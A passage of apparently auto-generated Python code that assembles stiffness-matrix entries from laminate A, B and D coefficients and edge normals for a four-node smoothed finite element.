k0[i3*dof+4, i2*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+4, i2*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+4, i2*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+4, i3*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+4, i3*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+4, i3*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+4, i3*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+4, i4*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+4, i4*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+4, i4*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+4, i4*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# -- row i4*dof+0 (A/B coefficients): columns at nodes i1..i4 --
k0[i4*dof+0, i1*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+0, i1*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+0, i1*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+0, i1*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+0, i2*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+0, i2*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+0, i2*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+0, i2*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+0, i3*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+0, i3*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+0, i3*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+0, i3*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+0, i4*dof+0] += Ac*((A11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+0, i4*dof+1] += Ac*((A12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + A66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+0, i4*dof+3] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+0, i4*dof+4] += Ac*((B12*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# -- row i4*dof+1 (A/B coefficients): columns at nodes i1..i4 --
k0[i4*dof+1, i1*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+1, i1*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+1, i1*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i4*dof+1, i1*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+1, i2*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+1, i2*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+1, i2*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+1, i2*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+1, i3*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+1, i3*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+1, i3*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+1, i3*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+1, i4*dof+0] += Ac*((A12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+1, i4*dof+1] += Ac*((A22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + A66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+1, i4*dof+3] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+1, i4*dof+4] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# -- row i4*dof+3 (B/D coefficients): columns at nodes i1..i4 --
k0[i4*dof+3, i1*dof+0] += Ac*((B11*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B16*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + B66*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
